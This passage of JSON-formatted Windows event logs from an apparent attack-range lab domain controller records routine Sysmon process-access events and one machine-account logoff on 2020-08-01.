C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-203D-5F25-0000-0010E2140600}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-203D-5F25-0000-0010E2140600}","TargetProcessId":"4496","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:50","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220409,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CBBF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4cbbf","LogonType":"3","EventReceivedTime":"2020-08-01 07:56:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nTargetProcessId: 4800\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\wbem\\wmisvc.dll+21c4|c:\\windows\\system32\\wbem\\wmisvc.dll+2031|C:\\Windows\\SYSTEM32\\ntdll.dll+7df1d|C:\\Windows\\SYSTEM32\\ntdll.dll+45ce9|C:\\Windows\\SYSTEM32\\ntdll.dll+29bdf|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2053-5F25-0000-0010F91A0600}","TargetProcessId":"4800","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\wbem\\wmisvc.dll+21c4|c:\\windows\\system32\\wbem\\wmisvc.dll+2031|C:\\Windows\\SYSTEM32\\ntdll.dll+7df1d|C:\\Windows\\SYSTEM32\\ntdll.dll+45ce9|C:\\Windows\\SYSTEM32\\ntdll.dll+29bdf|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nTargetProcessId: 4800\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2053-5F25-0000-0010F91A0600}","TargetProcessId":"4800","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
